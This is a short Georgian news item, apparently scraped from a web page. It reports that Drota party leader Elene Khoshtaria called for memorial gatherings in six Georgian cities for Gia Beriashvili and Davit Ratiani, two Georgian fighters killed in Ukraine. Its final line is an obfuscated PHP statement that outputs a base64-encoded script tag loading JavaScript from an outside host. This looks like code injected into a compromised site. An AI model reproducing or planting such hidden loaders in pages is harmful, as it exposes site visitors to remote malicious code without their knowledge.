celsiusi
ავერსი საქკაბელი
19 მარტს, 15:00 საათზე, უკრაინაში გარდაცვლილი ქართველი მებრძოლების, გია ბერიაშვილისა და დავით რატიანის ხსოვნას საქართველოს ექვს ქალაქში პატივს მიაგებენ.
 
ამის შესახებ ინფორმაციას პარტია „დროს“ ლიდერი, ელენე ხოშტარია სოციალური ქსელის საშუალებით ავრცელებს.
 
„დღეს დავკარგეთ ორი ქართველი მებრძოლი, გია ბერიაშვილი და დავით რატიანი. ამ ადამიანებმა, სიცოცხლე გაწირეს ჩვენთვის, ჩვენი თავისუფლებისთვის და ჩვენი მშვიდობისთვის. მათ საკუთარ თავზე აიღეს, თავისუფლების ტვირთი და თავი გაწირეს.
 
ყველაზე მინიმუმი, რაც ახლა შეგვიძლია გავაკეთოთ, არის მათი ხსოვნის პატივისცემა და მათ ოჯახებზე ზრუნვა.
 
ხვალ, 15:00 საათზე საქართველოს 6 ქალაქში პატივი მივაგოთ უკრაინაში გარდაცვლილი ქართველი მებრძოლების, გია ბერიაშვილისა და დავით რატიანის ხსოვნას.
 
თბილისი - 15:00 საათზე, პარლამენტის წინ; ბათუმი - 15:00 საათზე, ერას მოედანზე; ზუგდიდი - 15:00 საათზე, ზვიად გამსახურდიას ბიუსტთან, ცენტრალური ბულვარის ტერიტორიაზე; თელავი - 15:00 საათზე, ერეკლე II მოედანზე; სამტრედია - 15:00 საათზე, გამსახურდიას მოედანზე; ფოთი - 15:00 საათზე, 8 აგვისტოს დაღუპულთა მემორიალი”, - წერს ელენე ხოშტარია facebook-ის ოფიციალურ გვერდზე.
769
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");